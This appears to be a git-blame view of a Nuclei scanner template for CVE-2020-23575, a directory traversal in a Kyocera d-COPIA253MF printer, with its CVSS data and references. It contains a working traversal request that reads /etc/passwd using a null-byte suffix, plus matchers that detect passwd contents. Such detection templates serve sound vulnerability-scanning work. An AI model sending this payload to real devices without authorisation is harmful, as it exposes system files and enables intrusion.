2022-01-18 07:42:16 +00:00
id : CVE-2020-23575
info :
name : Kyocera Printer d-COPIA253MF - Directory Traversal
author : 0x_Akoko
severity : high
2022-05-09 16:12:52 +00:00
description : Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server.
2022-01-18 07:42:16 +00:00
reference :
- https://www.exploit-db.com/exploits/48561
2022-05-09 16:12:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-23575
2022-01-18 07:42:16 +00:00
- https://www.kyoceradocumentsolutions.com.tr/tr.html
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2020-23575
cwe-id : CWE-22
tags : cve,cve2020,printer,iot,lfi
requests :
- method : GET
path :
- "{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"
matchers-condition : and
matchers :
- type : word
part : body
words :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2022-01-18 07:42:16 +00:00
- "bin:.*:1:1"
condition : or
- type : status
status :
- 200
2022-05-09 16:12:52 +00:00
# Enhanced by mp on 2022/05/04